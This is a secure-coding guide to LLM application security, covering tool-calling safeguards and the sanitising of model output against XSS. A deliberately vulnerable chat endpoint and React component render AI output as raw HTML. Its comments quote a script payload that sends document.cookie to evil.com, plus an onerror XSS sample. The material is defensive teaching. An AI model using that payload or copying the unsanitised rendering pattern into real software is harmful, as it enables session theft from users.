LLM tool/function calling is a major attack vector (OWASP LLM06 — Excessive Agency). Defend with: (1) explicit tool allowlists instead of open access, (2) role-based access control per tool, (3) argument validation with strict schemas, (4) rate limiting per user/tool, (5) human-in-the-loop approval for destructive actions like refunds or deletions, and (6) comprehensive audit logging. Never give the LLM direct database access or the ability to send arbitrary communications.
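Layers (1)–(3) — allowlist, per-tool RBAC, and argument validation — can be sketched as a tool registry. The `lookup_order` tool and its roles are hypothetical examples; the dispatcher's structure is the point:

```typescript
interface ToolUser { id: string; role: string }

interface ToolDef {
  roles: string[];                                // who may call it
  validate: (args: any) => boolean;               // stand-in for a strict schema
  run: (args: any, user: ToolUser) => unknown;
}

// SECURE sketch - only registered, narrowly-scoped tools exist at all
const TOOL_REGISTRY: Record<string, ToolDef> = {
  lookup_order: {
    roles: ['support', 'admin'],
    validate: a => typeof a.orderId === 'string' && /^[a-z0-9-]+$/i.test(a.orderId),
    run: (a, user) => ({ orderId: a.orderId, requestedBy: user.id }), // stub result
  },
};

function handleToolCall(name: string, rawArgs: string, user: ToolUser): unknown {
  const tool = TOOL_REGISTRY[name];
  if (!tool) throw new Error('unknown tool');                    // allowlist
  if (!tool.roles.includes(user.role)) throw new Error('forbidden'); // RBAC
  const args = JSON.parse(rawArgs);
  if (!tool.validate(args)) throw new Error('invalid arguments'); // schema check
  return tool.run(args, user);
}
```

Destructive tools would additionally set a flag requiring human approval before `run` executes, and every call would be audit-logged.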
Sanitize LLM outputs before rendering to prevent XSS, harmful content, and hallucinated URLs.
// VULNERABLE: LLM output rendered directly as HTML
app.post("/api/chat", async (req, res) => {
const { message } = req.body;
const completion = await openai.chat.completions.create({
model: "gpt-4",
messages: [{ role: "user", content: message }],
});
const aiResponse = completion.choices[0].message.content;
// Directly inserting AI output into HTML — XSS risk!
// LLM could generate: <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>
// Or: <img src=x onerror="alert('XSS')">
res.json({ html: aiResponse });
});
// Client side
function ChatMessage({ html }) {
// dangerouslySetInnerHTML with unvalidated AI output!
return <div dangerouslySetInnerHTML={{ __html: html }} />;
}
Why This Matters
LLM outputs should never be trusted — they can contain XSS payloads, hallucinated URLs (potential phishing), or harmful content. Sanitize with: (1) pattern matching to detect script injection, (2) URL allowlisting to flag hallucinated links, (3) DOMPurify with a strict tag allowlist (no scripts, no event handlers, no iframes), (4) server-side sanitization before sending to the client, and (5) client-side double-sanitization as defense in depth. Instruct the model to use plain text/markdown, but never rely on it — always sanitize.
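Layers (1) and (2) — script-pattern detection and URL allowlisting — can be sketched as below. The allowed domain is a placeholder for your own; and note that pattern matching only *detects* payloads, it does not sanitize them — actually rendering the HTML still requires DOMPurify with a strict tag allowlist:

```typescript
// assumed allowlist for the sketch - replace with your own domains
const ALLOWED_LINK_DOMAINS = new Set(['example.com', 'docs.example.com']);

// detect common XSS vectors in model output (detection layer, not a sanitizer)
function containsScriptPayload(output: string): boolean {
  return /<script\b|on\w+\s*=|javascript:/i.test(output);
}

// return any URLs pointing outside the allowlist (possible hallucinated/phishing links)
function flagUntrustedLinks(output: string): string[] {
  const urls = output.match(/https?:\/\/[^\s)"'<>]+/g) ?? [];
  return urls.filter(u => {
    try { return !ALLOWED_LINK_DOMAINS.has(new URL(u).hostname); }
    catch { return true; } // unparseable URL: treat as untrusted
  });
}
```

A chat route would run both checks server-side before responding, then sanitize again client-side as defense in depth.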